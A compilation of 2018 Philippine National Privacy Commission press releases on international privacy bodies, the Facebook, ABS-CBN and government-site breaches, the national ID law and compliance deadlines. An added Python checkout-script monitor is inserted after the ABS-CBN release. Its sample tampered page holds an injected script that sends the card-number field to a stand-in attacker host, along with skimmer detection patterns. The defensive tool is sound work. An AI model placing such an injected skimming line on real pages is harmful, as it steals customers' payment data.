“Ayala Corporation extends its congratulations to and support for Commissioner Raymund Enriquez Liboro of the NPC, who represents the Philippines in the ICDPPC. While the Philippines has been actively committed to the enforcement of data privacy through the NPC, this election grants the country a global leadership role in the international discussion,” the post said.
Philippine Chamber of Telecommunications Operators (PCTO) Vice President Atty. Roy Ibay also applauded NPC for “quickly landing its place” among nations putting data protection as a cornerstone for the progress and development of the information and communications technology sector.
Teodoro Padilla, President of the Pharmaceutical and Healthcare Association of the Philippines (PHAP), attributed the country’s election to Liboro’s successful guidance in the implementation of the National Data Privacy Act of 2012.
“The Pharma Sector commends the National Privacy Commission as steward of data privacy rights while ensuring the free flow of information for innovation, growth and national development,” Padilla said. “Economic growth can be achieved from cultivating a culture of mutual trust, transparency and collaboration with the public and private sectors.”
Padilla added that Liboro is forming and fostering a community of data privacy advocates by encouraging sector participation and helping them attain full compliance with the DPA. This collaborative approach can be considered “a global best practice and crucial in advancing data privacy protection” in Asia-Pacific.
Gathering 236 delegates from 76 countries, the recently concluded 40th ICDPPC has adopted a roadmap to cement the Conference as a more permanent and vocal international organization advancing data privacy and protection.
This includes the creation of a consultation platform or “contact group” for improved dialogue and exchanges of ICDPPC activities; a declaration on ethics and data protection in artificial intelligence; resolutions on e-learning platforms; and collaborations between Data Protection Authorities and Consumer Protection Authorities.
###
-
PH WINS SEAT IN INT’L. PRIVACY BODY
BRUSSELS, Belgium - Despite being a newcomer to data privacy regulation, the Philippines has earned a voting seat in the 5-member executive committee of the International Conference of Data Protection and Privacy Commissioners (ICDPPC), a worldwide conference of 119 independent regulators coming together to explore high-level proposals on data privacy and protection. The ICDPPC is considered the world’s premier body on data protection and privacy. The voting was held on October 23, 2018 during the closed session meeting at the Palais d’Egmont in Brussels, Belgium.
Commissioner Raymund Enriquez Liboro of the National Privacy Commission (NPC) has led the Philippines’ active involvement in the conference for the last two years, drawing attention to the country’s efforts to step up to global data protection standards with a uniquely Asian approach to regulation. “It is an honor for the NPC to represent the country at the ICDPPC, especially in a leadership capacity. This is an acknowledgement of the hard work we expend, as well as the country’s commitment to data protection,” Liboro said.
The Conference’s Executive Committee is composed of seven elected members plus one observer, with a term of two years. Aside from the Philippines, the current members include the privacy authorities of Australia, Canada, Burkina Faso, Bulgaria, Albania, Mexico, and the United Kingdom, which holds the chairmanship under Commissioner Elizabeth Denham. The conference has two additional members, namely the next hosting authorities: Albania and Mexico. The 2018 Conference has attracted more than 1200 delegates from all over the world.
“Having a seat at the committee’s table to take part in addressing challenges that privacy regulators face is definitely a privilege for the NPC. It’s an opportunity for learning from each other’s experience. Definitely, the Philippines, although young, has a lot to contribute too, especially in assisting new members,” Liboro added.
The conference continues to grow having approved four additional members in the recent closed session coming from Germany, Korea, and Argentina; and eleven new authorities with observer status, notably from Asia, namely: India, Indonesia, Malaysia, Saudi Arabia, and Abu Dhabi.
The NPC’s election comes at a time when the call for a new world order governing data is gaining traction on a global scale.
“What we are seeing today is a crisis of trust that is fueled by unauthorized profiling, surveillance and increasing cases of personal data breaches. It’s a hint for us to take a different tack and integrate ethics in the way we process personal data,” Liboro said.
As part of the committee, the NPC is expected to take part in setting the agenda of the conference and in defining its strategic direction for the next two years.
“I’m very happy that the Philippines is becoming a new member of the Executive Committee. I think it shows the geographical diversification of this Executive Committee – the fact that new entities are entering and bringing energy and new ideas to this Executive Committee. I think it strengthened the International Conference so it’s a very good signal and I’m happy to welcome the Philippine authority in the group,” French Privacy Commissioner Isabelle Falque-Pierrotin and outgoing Chair of the ICDPPC, said.
The NPC became an ICDPPC member in October 2016 after passing membership requirements and demonstrating commitment to global standards in protecting personal data and privacy in the Philippines. At the time, the NPC was only several months old, having been formed in March that same year. Since then, the NPC steadily advocated for the Philippines and the Asian regional voice to resonate in the global forum.
It has co-authored resolutions on: artificial intelligence, e-learning, conference census, and the future of the conference. It is also sitting in the working group for cross-border privacy law enforcement. The Philippines has always been cited for its creative approaches and constructive stakeholder engagement.
###
-
PH joins 40th Int’l. Privacy Commissioners’ Conference
BRUSSELS, BELGIUM --- The National Privacy Commission (NPC) is representing the Philippines in the 40th International Conference of Data Protection and Privacy Commissioners (ICDPPC), a premier global forum connecting the efforts of about 119 privacy and data protection authorities from over 70 countries across the globe.
The NPC’s chairman and Philippine Privacy Commissioner Raymund Enriquez Liboro said this marks the third time the country is taking part in the event. “Since we’ve been granted full membership status in 2016, the Philippines has shown active participation in the global forum, becoming a strong voice in its own right in discussions around privacy enforcement,” Liboro said.
“We have always strived to present the Filipino context in particular and the Asian milieu in general, pointing to the diverse approaches present in the Asian region and thus, the different cultural contexts that actually influence data privacy concepts and practices,” Liboro added.
Happening just a few months after the EU’s General Data Protection Regulation came into force in May, this year’s conference will be held on October 22-26, focusing on digital ethics as its theme.
“There is no better time to put the spot light on the ethical dimension of data protection than today, when we are right on the cusp of major technology shifts of the digital era and unprecedented cross-border data flows happening globally,” Liboro said.
The conference will have a closed session (only for accredited members and observers) and a public conference. Among the activities to be conducted during the closed session are the election of a 5-member executive committee that works on the agenda of the Conference for the next two years; setting up of working groups; voting on proposed resolutions and declarations; defining the conference’s strategic direction; and deciding on membership applications. Election of ICDPPC’s next 5-member board will take place on the second day of the conference, October 23.
It was in October 2016 when ICDPPC granted full membership status to the NPC after passing membership requirements and demonstrating commitment to strict standards in protecting personal data and privacy in the Philippines. At the time, the NPC was only several months old, having been formed in March that same year. Since then, the NPC steadily advocated for the Asian regional voice to resonate in the global forum.
# # #
-
UPDATED: PRESS STATEMENT OF PRIVACY COMMISSIONER RAYMUND ENRIQUEZ LIBORO ON FACEBOOK’S LATEST BREACH
1. At around 12:49 AM of September 28, we received informal notice from Facebook representatives that they had found a vulnerability in their app that was exploited by malicious attackers.
2. Facebook claims that the vulnerability affected around fifty million users, exposing personal data stored in their Facebook profiles.
3. The vulnerability was attributed to a combination of several programming errors in updates made in July 2017. As a result, malicious intruders were able to generate access tokens.
4. These access tokens allowed the intruders to log into affected FB profiles as if they were the actual profile holders. This means they had the ability to access data reserved for account holders even without having to enter the user's password.
5. As a remediation measure, FB terminated the sessions of persons it identified as having been affected and had them enter their login credentials again. This morning, the company notified affected users of the incident. We have informed Facebook, however, that the notification it sent to individuals leaves much to be desired.
6. According to the company’s representatives, the investigation is still in its early stages. They have not determined yet how many Filipinos are affected and whether misuse of personal information had resulted from this breach.
7. The NPC has prescribed breach management procedures in place and we expect Facebook to abide by these rules.
8. The NPC shall notify the public about developments and its actions on this matter. To protect themselves, all Facebook users must enable multi-factor authentication on all platforms, employ strong passwords, and practice good digital hygiene. For more information on how to love yourself online, see https://www.privacy.gov.ph/30-ways/
Privacy Commissioner Raymund Enriquez Liboro
# # #
-
Gov’t. taps “hack bayani” community to help secure PhilSys, data-driven public projects
1. Privacy Commissioner Raymund Enriquez Liboro is tapping the assistance of white hat hackers in the country to help secure Philippine cyberspace and help create robust public ICT systems in the country, beginning with the soon-to-be implemented national identification card.
2. “We can do a lot more to help protect the data that will come out of PhilSys processing. You can do your part in it as well as “hackers ng bayan” and indeed I strongly urge you to help government make this right. The need for your voice is now more acute. Your country needs you more than ever,” Liboro told the crowd of local hackers who converged yesterday for the 2-day RootCon 12 at Taal Vista Hotel in Tagaytay City.
3. Commissioner Liboro said one of the biggest challenges for the government today is to deliver basic services at the same level of efficiency as the private sector, which he said can only be done through digital transformation.
4. “The challenge right now, mga kababayan, is that our people expect the government to give the same level of efficiency that they get from the private sector. Meaning, it’s no longer enough for government now to simply reform. It must pursue rapid, robust and sometimes bold transformation. And we must transform digitally,” Liboro said.
5. The privacy commissioner believes the fastest and safest route to digital transformation would be through an active collaboration between the government and patriotic hackers.
6. “As the country’s leading experts on the offensive and defensive aspects of data security, you as “hackers ng bayan” or “hack-bayani”, are at the center of every data protection effort. It is you who will design and implement the structures that keep our data safe. No longer will you be the unsung heroes keeping our boat afloat. You will be at the vanguard, keeping threats and hazards at bay, so that everyone’s data will remain safely private,” Liboro said.
7. Around 300 local “hackers of all colors” joined the RootCon 2018, from infosec professionals of the corporate world to members of the so-called “digital underground”. Information Security Officers Group (ISOG) officers Archieval Tolentino and Dan Duplito said the Commissioner’s call on “hack bayani” to help the government sends a very positive signal to the Filipino hacking and security community.
8. “I like the idea behind “hack bayani” and I think it’s about time that we do it, especially with the NPC leading this era of [privacy] awakening for the people, and especially for hackers. It would lead to a shift in the way people see hackers,” Tolentino said.
9. “Aside from just looking for vulnerabilities [in government systems] I think “hack bayanis” may also help by protecting and defending government [digital interests], when needed,” Duplito said.
10. During the event, Liboro also announced an upcoming project between the NPC and the Philippine Statistics Authority called “hackBAYAN” where at least thirty local white hats shall be enlisted to help PhilSys managers fully gauge the risks of running it, help identify potential problem areas, and implement appropriate risk reduction and mitigation strategies.
11. hackBAYAN is a Delphi study that runs over the course of two weeks. Liboro said the results of this study will serve as a guide for securing PhilSys and provide a pattern for many similar collaborations aimed at fortifying public digital institutions.
# # #
-
Updated: Press Statement of Privacy Commissioner Raymund Enriquez Liboro on the Data Breach Incident of ABS-CBN’s online Stores
RELEASE 01 - September 19, 2018
1. News of a possible data breach of ABS-CBN’s online stores reached the National Privacy Commission this morning: customers reportedly face the possibility of theft of their financial data due to a payment skimmer discovered by a Dutch security researcher.
2. At 12:37 PM, the Commission received a breach notification from the company’s Data Protection Officer (DPO), Jay C. Gomez. At around the same time, the company also publicly disclosed the incident on Twitter.
3. We expect ABS-CBN’s DPO to act in accordance with breach management standards set forth by the Commission, and fully set in motion its breach response protocols, including the safeguarding of their systems and the prevention of possible harms to affected data subjects.
4. The National Privacy Commission is monitoring the situation and expects ABS-CBN to send us a full report on the incident within five days.
RELEASE 02 - October 12, 2018
5. The National Privacy Commission received ABS-CBN’s full report of the data breach on September 24, at 7:51 PM. This is within the 5-day deadline required for its submission, as mandated in NPC Circular 16-03.
6. The report shows that ABS-CBN learned of the breach incident at 8:18 AM of September 19, through a ZDNet online article published nine hours earlier. About 25 minutes later, the company reported the incident to its Managed Security Service Provider (MSSP) to assist in the investigation and containment efforts.
7. The MSSP found a “malicious java script” on the ABS-CBN online store, which prompted management to instruct its third-party vendor to take the website down. The compromised site was taken down on September 19, at 9:28 AM.
8. The malicious code or backdoor program captures a customer’s payment card information while an online purchase transaction is in progress. Thus, the attacker was able to illegally obtain in real-time, the personal data of affected customers, including their name, credit card number, its expiration date, as well as the card verification number. Other data collected were the data subject’s email address, phone number, and residential address.
9. The attacker uploaded the malicious code on August 16 and it remained active until the site was taken down. The credit card data of those who transacted with the site from August 16 until September 18 were presumed to be compromised.
10. The online store has forty-four thousand registered users. During the period when the site was compromised, there were a total of 208 validated purchase transactions from unique customers. The company said that, within 72 hours upon discovery of the breach, it was able to inform 202 affected data subjects through email and/or cell phone message. There were 6 customers, however, who either did not provide a contact number or had an invalid email address, whom they would have to reach by postal mail.
11. Affected data subjects were advised by ABS-CBN to immediately inform their bank and credit card provider and change their password. They were also warned not to give any personal or financial information to anyone who may claim to be a company representative.
12. Users of the UAAP Online Store were not affected. Management took it down only as a precautionary measure since it points to the same payment gateway and uses the same provider platform as the compromised site.
13. Oddly, the MSSP also found suspicious logins from one of the administrator accounts of the third-party vendor, which the concerned administrator acknowledged to be not his.
14. ABS-CBN then required its third-party vendor to reset all passwords and use two-factor authentication.
15. Upon examining the breach report submitted by ABS-CBN, the NPC investigation team summoned DPO Gomez for clarification on September 27.
16. Citing the MSSP’s report, Gomez said the incident is likely a coordinated attack and part of the massive card skimming campaign of cyber-criminal and threat group Magecart.
17. We note that had ABS-CBN insisted that its third-party developer use multi-factor authentication earlier, the site would not have been compromised.
18. The National Privacy Commission treats every instance of data breach with grave concern as it potentially puts at risk people’s data privacy.
19. In this regard, we strongly advise Personal Information Controllers (PICs) and Personal Information Processors (PIPs) to monitor their systems regularly, and have security checks in place, including the full implementation of at least two-factor authentication.
20. The National Privacy Commission’s investigation of the breach incident is still on-going and we appreciate the continued cooperation of ABS-CBN management.
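The skimmer described in items 7 to 9 worked by adding a script to the checkout page that ran alongside the store’s legitimate scripts for a month before anyone noticed, and item 19 asks PICs and PIPs to monitor their systems regularly. One concrete form of that monitoring is to fingerprint every script a checkout page serves and diff it against a known-good baseline, flagging anything new that touches payment fields or talks to a host outside the store’s allowlist. The following Python is an added example for this page, not code from the NPC, ABS-CBN or its vendor; the two HTML pages, the hostnames `cdn.example-store.test` and `collector.attacker.test`, and the `sendElsewhere` call in the tampered page are all constructed for illustration.

```python
"""Checkout-page script baseline check (added example; constructed sample pages)."""
import hashlib
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Indicators: references to payment form fields, and any absolute URL host.
PAYMENT_FIELD_RE = re.compile(r"card.?number|cvv|cvc|expir", re.IGNORECASE)
URL_HOST_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")


class _ScriptCollector(HTMLParser):
    """Collects (src, inline_text) for every <script> element on a page."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._in_script = False
        self._src = None
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            self._in_script = True
            self._src = dict(attrs).get("src")
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_script:
            self.scripts.append((self._src, "".join(self._buf).strip()))
            self._in_script = False


def collect_scripts(html):
    parser = _ScriptCollector()
    parser.feed(html)
    return parser.scripts


def script_fingerprint(src, text):
    """External scripts are keyed by URL; inline scripts by SHA-256 of their body."""
    if src:
        return "src:" + src
    return "inline:" + hashlib.sha256(text.encode("utf-8")).hexdigest()


def build_baseline(known_good_html):
    """Fingerprints of every script on a reviewed, known-good copy of the page."""
    return {script_fingerprint(s, t) for s, t in collect_scripts(known_good_html)}


def audit_page(html, baseline, allowed_hosts):
    """Return a finding for each script not present in the baseline.

    Severity is 'high' when an unknown script both reads payment fields and
    references a host outside the allowlist (the skimmer pattern), 'medium'
    when only one of those holds, 'low' for any other unreviewed change.
    """
    findings = []
    for src, text in collect_scripts(html):
        if script_fingerprint(src, text) in baseline:
            continue
        if src:
            host = urlparse(src).hostname or ""
            findings.append({
                "kind": "unknown_external_script",
                "src": src,
                "unknown_hosts": [host] if host not in allowed_hosts else [],
                "touches_payment_fields": False,
                "severity": "high" if host not in allowed_hosts else "medium",
            })
            continue
        unknown_hosts = sorted({h for h in URL_HOST_RE.findall(text) if h not in allowed_hosts})
        touches_payment = bool(PAYMENT_FIELD_RE.search(text))
        if touches_payment and unknown_hosts:
            severity = "high"
        elif touches_payment or unknown_hosts:
            severity = "medium"
        else:
            severity = "low"
        findings.append({
            "kind": "unknown_inline_script",
            "src": None,
            "unknown_hosts": unknown_hosts,
            "touches_payment_fields": touches_payment,
            "severity": severity,
        })
    return findings


# Constructed sample: the reviewed checkout page, and the same page after a
# third script has been injected into it (hostnames are illustrative only).
ALLOWED_HOSTS = {"cdn.example-store.test"}
KNOWN_GOOD_HTML = """<html><head>
<script src="https://cdn.example-store.test/checkout.js"></script>
<script>window.storeConfig = {currency: "PHP"};</script>
</head><body><form id="pay"><input id="cardnumber"><input id="cvv"></form></body></html>"""
TAMPERED_HTML = KNOWN_GOOD_HTML.replace(
    "</body>",
    '<script>sendElsewhere(document.querySelector("#cardnumber").value, '
    '"https://collector.attacker.test/c");</script></body>',
)


def demo():
    baseline = build_baseline(KNOWN_GOOD_HTML)
    return audit_page(TAMPERED_HTML, baseline, ALLOWED_HOSTS)


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

In practice the baseline is rebuilt only after a reviewed deployment, and the audit runs on a schedule against the live page; a single `high` finding on a checkout page is worth treating as an incident rather than a ticket. Subresource Integrity and a Content-Security-Policy with a `script-src` allowlist would have blocked the injected script outright; this check is the monitoring layer that catches what those controls miss or are not yet deployed for.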
# # #
-
Press Statement of Privacy Commissioner Raymund Enriquez Liboro on the President's Signing of the National ID Law
1. President Rodrigo Roa Duterte has signed the National ID law on the 6th of August 2018, creating the Philippine Identification System to improve the delivery of government and other services to the public, especially those who lack government-issued identification cards.
2. The National Privacy Commission supports the proper implementation of this law in accordance with its role in the technical working group led by NEDA and PSA; and in line with the Commission's dual mandate to "protect the fundamental human right of privacy, of communication while ensuring free flow of information to promote innovation and growth," as inscribed in the Data Privacy Act of 2012 (DPA).
3. We have provided the implementing agency with advice and guidance to address the privacy risks identified at the early stage of project design. The public may rest assured that the NPC shall continuously press for the adoption of internationally accepted data protection and privacy standards in the implementation of the National ID, such as the deployment of a Privacy by Design approach, and the adoption and comprehensive application of the NPC’s Data Privacy Accountability & Compliance Framework.
4. In the implementation of the National ID System, the PSA, together with the NPC, shall endeavor to ensure the full protection of the people’s data privacy rights.
###
-
5 gov’t. agencies to jointly handle telco consumer complaints
The government will launch an all-out, synchronized effort to promptly deal with consumer complaints on telco services such as those involving data privacy violations, text scams, vanishing load, unauthorized charges, defective products, and denial of subscription plan activation, among others, Privacy Commissioner Raymund Enriquez Liboro said on Friday.
Liboro said the National Privacy Commission (NPC) is jointly working with the Department of Trade and Industry (DTI), Department of Information and Communications Technology (DICT), National Telecommunications Commission (NTC) and the Department of Justice (DOJ) on a draft joint administrative order (JAO) aimed at providing a more efficient way of resolving telco consumer concerns.
"Following the lead of the DTI, it should be noted that we are looking beyond just addressing consumer concerns here. This joint effort is aimed to serve as a component of the high-trust society, as envisioned in Ambisyon 2040, which is based on the building of responsive institutions that people can depend on," Liboro said.
On Tuesday, high-ranking representatives of the five agencies met with consumer groups at the NPC's office at the PICC Convention Center in Pasay City for the first of a series of public consultations on the JAO.
In the draft JAO, the NPC shall have primary and sole authority to deal with cases involving alleged violations of the Data Privacy Act and take cognizance of matters related to privacy and data protection.
The DTI shall deal with complaints involving legal or regulatory violations related to defective products, non-conformity with or violation of terms and conditions, misleading advertisements, fraudulent sales promos, deceptive sales practices, and other complaints related to warranty.
The NTC shall handle cases involving legal or regulatory violations related to text scams/spam messages, vanishing load, denial of subscription plan applications, electronic billing, fair use policy, lock-in periods, poor technical/customer service care and accessibility, unauthorized charges, and value-added services.
For the public's convenience, DTI Undersecretary Ruth B. Castelo said among the salient features of the draft JAO is the so-called "no wrong door policy" where consumers may lodge complaints via any of the receiving agencies, regardless of its nature. For instance, a privacy-related e-billing complaint may be filed with the DICT office, which shall then endorse it to the NPC or the DTI depending on its merits. After taking appropriate action, the concerned agency shall then inform the endorsing agency and the complainant of the action taken.
Should there be a need to institute criminal action after having resolved the complaint, the concerned agency shall then refer the matter to the DOJ for the conduct of criminal investigation and prosecution of offenders, in accordance with existing laws, rules, and regulations.
# # #
-
Celebrate Filipino Data Privacy Rights on Privacy Awareness Week 2018 --NPC
In the wake of the recent spate of media reports linked to data breaches and other privacy-related concerns, the National Privacy Commission (NPC) is urging business, government and civil society organizations to participate in the upcoming Privacy Awareness Week (PAW) on May 28 to 31 and publicly commit to the safeguarding of people’s personal data.
Privacy Commissioner Raymund Enriquez Liboro said the privacy issues that recently struck the food service industry should be taken as a wake-up call for the entire business community as well as all organizations that process personal data.
"There's no better time than today to combat the growing threats to the safety of our personal data. And there's no better way to do this than as a community, which is what the PAW activities hope to foster," Liboro said.
PAW is a celebration of people's data privacy rights along with all the benefits of data privacy protection, such as better customer trust, greater competitive advantage and stronger protection of company assets.
"All of us are data subjects so PAW is a community celebration. For organizations, it means showcasing your sense of responsibility and assuring your customers and constituents that the personal data they entrusted you is in good hands. For the rest of us, it's a reminder that we can assert our data privacy rights, that we have a personal responsibility to protect it however we can," Liboro said.
With this year's theme focused on "Protecting the Filipino's Right to Data Privacy", the NPC spearheads the weeklong festivities with a 2-day summit of data protection officers (DPOs) from various sectors all over the country. Dubbed as the 1st National Data Privacy Conference, the flagship event is set on May 28 - 29, at the Philippine International Convention Center in Pasay City.
Around 2,000 DPOs are expected to join the event, comprising delegates from the academe, civil society, top corporations and the government.
During the conference, the NPC will also launch a year-long social awareness campaign focusing on responsible digital citizenship among Filipinos. Called the “Privacy, Safety, Security and Trust (PSST!) Online” or PSST!, the campaign is aimed at arming Filipinos with the information and self-help tools they can use to protect themselves and their loved-ones from the dangers arising from the careless handling of their own personal data when using online applications and services on their mobile and desktop devices.
Personal Information Controllers (PICs) and Personal Information Processors (PIPs) or organizations processing personal data, are also expected to get into the PAW festivities in their own way, and celebrate data subject empowerment in a manner that would be meaningful to their customers, members and employees.
The Privacy Awareness Week or PAW is an annual international effort to draw public attention towards privacy issues and the importance of protecting personal information. It is held across territories of the members of the Asia Pacific Privacy Authorities (APPA) Forum, which include Australia, British Columbia, Canada, Colombia, Hong Kong, Japan, Republic of Korea, Macao, Mexico, New South Wales, New Zealand, Peru, Queensland, Singapore, FCC - United States, FTC - United States, Northern Territory - Australia, and Victoria - Australia. This year marks the second time that the Philippines will officially celebrate PAW in solidarity with other APPA members and other privacy adherents all over the world.
# # #
-
NPC investigates multiple government website breach
1. The National Privacy Commission (NPC) yesterday summoned the management and other responsible officials of seven schools, institutions, and local government units as it investigates data breaches they sustained following an organized attack on government and commercial organizations last April 1, 2018.
2. The privacy body earlier sent notice to top officials of Taguig City University; the Department of Education offices in Bacoor City and Calamba City; the Province of Bulacan; Philippine Carabao Center; Republic Central Colleges in Angeles City; and Laguna State Polytechnic University, to appear before it from April 23 to 24. This was to explain why they notified neither the NPC nor the affected data subjects within 72 hours of the breach, whose personal data were made available for download via links posted on Facebook.
3. As of yesterday, none of the affected organizations were able to issue any data breach notifications whatsoever, as part of their obligations as Personal Information Controllers (PICs) under the Data Privacy Act of 2012. “PICs are required to employ organizational, technical, and physical measures to protect personal data,” said Privacy Commissioner Raymund Enriquez Liboro. “This includes the duty to inform data subjects and this Commission if there is a serious data breach.”
4. The move comes after digital investigators from the National Privacy Commission determined that each of the exposed databases contained sensitive personal information or information that could be used to perpetrate identity fraud; that the exposed data is in the hands of unauthorized persons; and that the exposure of the data raises a real risk of serious harm to the affected data subjects.
5. In its initial estimate, the NPC said the combined number of exposed records in the breach were those of at least 2,000 individual data subjects. They include their name, address, phone number, email address, and in some instances, even passwords and school details.
# # #
-
NPC opens probe on Facebook
The National Privacy Commission (NPC) is opening an investigation on Facebook following Mark Zuckerberg's admission of the company's faults in the Cambridge Analytica data scandal that affected Filipino Facebook users.
In a formal letter addressed to Zuckerberg, the NPC is requiring Facebook to submit a number of documents relevant to the case, to establish the scope and impact of the incident to Filipino data subjects.
“We are launching an investigation into Facebook to determine whether there is unauthorized processing of personal data of Filipinos, and other possible violations of the Data Privacy Act of 2012,” an excerpt of the letter sent to Zuckerberg reads. The letter was signed by Privacy Commissioner Raymund Enriquez Liboro and Deputy Commissioners Ivy Patdu and Leandro Aguirre.
The privacy watchdog will particularly look into how Facebook shares the personal data of Filipino users with third parties. It will also address the bigger picture of protecting the data privacy rights of the millions of Filipinos who use Facebook in their daily lives.
On Thursday, the NPC decided to launch a formal investigation to seek more concrete actions from Facebook.
-
Joint Press Statement from Privacy Commissioner Raymund Enriquez Liboro and LTFRB Board Member Atty. Aileen Lourdes Lizada
1. In the common pursuit of protecting the rights and interests of drivers and the commuting public, the National Privacy Commission (NPC) and the Land Transportation Franchising and Regulatory Board (LTFRB) are jointly looking into the transaction details of the announced Grab-Uber acquisition. Since this acquisition potentially involves personal data, the NPC is keen on safeguarding data subjects’ privacy in the process.
2. Our intention is neither to hinder any legitimate business exchange, nor prevent the public from using the services of Grab, so long as personal data privacy is respected and protected. The NPC is closely looking into this deal given consumer fears that the company’s dominant market position might lead to possible abuses in how it processes personal data.
3. In this regard, we call on Grab to be fully transparent as to what will happen with the personal data of around 1.2 million Filipino Uber account holders, and to ensure that these data are lawfully processed in the course of the acquisition. Transparency, choice, notice, security, redress mechanisms & other data privacy issues should be considered at all stages of the deal.
4. Grab must implement appropriate organizational, physical and technical security measures, if the acquisition will involve any personal data processing. Mechanisms to accommodate the public’s data privacy concerns relating to the deal should also be present.
5. The NPC assures the public that it shall exercise its compliance and monitoring functions to check for any unauthorized processing during the acquisition, especially given that data subjects may have limited capacity to check it, themselves.
6. On a related note, regarding the proposal to require public utility vehicles to install closed-circuit television and global positioning system devices, we would like to assure the riding public that the NPC and the LTFRB are working closely to ensure that people’s right to data privacy is fully protected and respected, in accordance with the law.
###
-
Press Statement from Privacy Commissioner Raymund Enriquez Liboro on the Facebook Controversy involving Cambridge Analytica
1. The National Privacy Commission (NPC) has been in touch with Facebook since information on the controversy involving Cambridge Analytica rose to prominence following whistleblower allegations in March 2018.
2. On March 27, the NPC met with Facebook representatives to look into the matter and ascertain if and to what extent, Filipino users were affected. Facebook told the NPC that 558 Filipino users installed Aleksandr Kogan’s personality quiz app, through which personal data may have been “improperly shared with Cambridge Analytica”. From this, 1,175,312 more Filipinos may have been subsequently affected via sharing, making the Philippines the second most affected country in terms of total number of data subjects.
3. Given this magnitude, the NPC required Facebook to provide updates on the measures taken to mitigate the risks that ensued from the controversy. The company said it plans to restrict data access of third parties on Facebook starting April 9. In the process, users shall also be notified if their information may have been improperly shared with Cambridge Analytica.
4. Mark Zuckerberg claims he values the trust of his customers. This incident involving Cambridge Analytica clearly puts this to question. While Facebook claims remediation is underway, we continue to call on Facebook to face us Filipinos with a new level of transparency. This should begin with their terms of service and settings that could be unclear to users. The process by which Facebook monitors third party app developers and tech providers who may have access to Filipino user data should also be looked into. This is to ensure that adequate protective nets are in place to guard against any abuse or misuse of data.
5. We assure the public that we will continue to look into this to ensure that no further harm is done against data subjects. Facebook will be asked to shed more light on the matter and explain further its privacy policies and practices. We will involve the public in these discussions.
6. In the meantime, we call on Filipino Facebook users to be circumspect in using the platform and exercise online personal vigilance. Users should minimize the personal information they share online and maximize the use of existing privacy protection features and tools. We encourage the public to exercise a new level of care about their privacy and to take part in forming the future of Facebook in the country.
###
-
Statement of Privacy Commissioner Raymund Enriquez Liboro On the Uber and Grab Merger
- Yesterday, both Uber and Grab issued public statements announcing the sale of Uber’s TNV and food delivery business in Southeast Asia to Grab. From these statements, we understand that the Uber service will no longer be available in Southeast Asia including the Philippines, from 8 April 2018. In the interim, Grab is to take Uber’s drivers onboard the Grab TNV platform. In the same statement, Grab also made it known that Uber users will need to download and register with Grab to use their TNV services.
- Shortly after these public statements, Grab, through counsel Atty. John Paul Nabua, assured the National Privacy Commission of their continued cooperation and compliance with Philippine data privacy and protection laws. Grab also declared to the Commission that there will be no sharing of any user data between Uber and Grab. Uber users and drivers will be required to register anew with Grab to allow them to use the Grab TNV platform.
- We have called on Grab to a meeting next week to enlighten the Commission on this "sale", particularly its provision on the processing of Filipino drivers’ and users’ data and the measures they take in protecting these data. As the biggest TNV provider in the Philippines after the exit of Uber, we want Grab to demonstrate that they could “walk the talk” when it comes to protecting personal data and upholding the data privacy rights of its drivers and users.
- This sale does not affect our ongoing investigation into past Uber breaches that involved Filipino users. This investigation is continuing and a report would be out soon.
Raymund Enriquez Liboro
Privacy Commissioner
National Privacy Commission
Republic of the Philippines
# # #
-
NPC extends data processing systems registration for covered professionals
The National Privacy Commission (NPC) is extending up to July 2 the registration period for the data processing systems (DPS) of individual Personal Information Controllers (PICs) and individual Personal Information Processors (PIPs), specifically for covered professionals. These include medical doctors, lawyers, accountants and dentists, among others, who process personal data and satisfy the criteria for mandatory DPS registration.
Privacy Commissioner Raymund Enriquez Liboro said the adjusted registration schedule applies only to individual PICs and PIPs. All other PICs and PIPs are still covered by the March 8 DPS registration deadline, as earlier mandated by the NPC.
"We are not extending the March 8 deadline for all other PICs and PIPs; however, the NPC shall continue accepting late submissions,” Liboro said.
Liboro also clarified that individual PICs and PIPs are excluded from the coverage of Appendix 1 of NPC Circular 17-01, which provides an initial determination of sectors or institutions mandated to register as the personal data processing they conduct is likely to pose a risk to the rights and freedoms of data subjects or is not occasional. As such, registration is only mandatory for individual PICs and PIPs that have at least two hundred fifty employees; or that process sensitive personal information of at least one thousand individuals.
“DPS registration is a compliance requirement for PICs and PIPs. It is also a way to demonstrate accountability in safeguarding personal data. The Commission notes the efforts of PICs and PIPs to be data privacy compliant,” Liboro said.
PICs and PIPs who have successfully created their user account with the NPC’s online portal and finished their registration for the year have the option to access and update their registration data on a regular basis.
PICs and PIPs who have registration-related issues and concerns are advised to contact [email protected].
-
NPC extends deadline of 2017 annual incident report to June 30
Organizations and professionals processing personal data in the country now have until June 30 to submit their first annual security incident report to the National Privacy Commission (NPC) after the agency adjusted the deadline, which was initially set on March 31.
The annual security incident report is among the yearly compliance obligations of Personal Information Controllers (PICs), as provided for in the IRR of the Data Privacy Act of 2012, and as discussed in NPC Circular 16-03. It contains all security incidents of the PIC from January 1 to December 31, 2017, including a summary of every breach incident and aggregate data of non-breach incidents.
"We are intent on coming up with a version of the annual report that is more concise and easier for DPOs to prepare. At the same time, the Commission is also seeking ways to align the annual report with the requirements of other privacy regulations on international data flows such as the GDPR and APEC-CBPR," said Privacy Commissioner Raymund Enriquez Liboro.
The Commission is expected to announce specific changes in the annual security incident report in a few weeks. Meantime, Liboro said annual reports that have already been submitted by PICs based on present guidelines would be considered sufficient for the year.
-
Privacy Commission cautions DOH on sharing of Dengvaxia master list
PRESS RELEASE
The National Privacy Commission (NPC) has advised the Department of Health (DOH) to be circumspect in sharing sensitive personal information of individuals, saying it should only do so if it deems that such sharing or disclosure is authorized under law, adheres to data privacy principles, and there are reasonable and appropriate security measures in place to protect the data.
In an advisory opinion dated 26 February 2018 issued in response to the formal request made by the DOH, Privacy Commissioner Raymund Enriquez Liboro said the disclosure to another government agency or private entity of a copy of the DOH master list of individuals vaccinated with Dengvaxia must be “provided for by existing laws and regulations or a data subject has given his or her consent.”
“We emphasize that the government is one of the biggest repositories of the personal data of citizens. The government or its agencies, however, do not have the blanket authority to access or use the information about private individuals under the custody of another agency,” Liboro said.
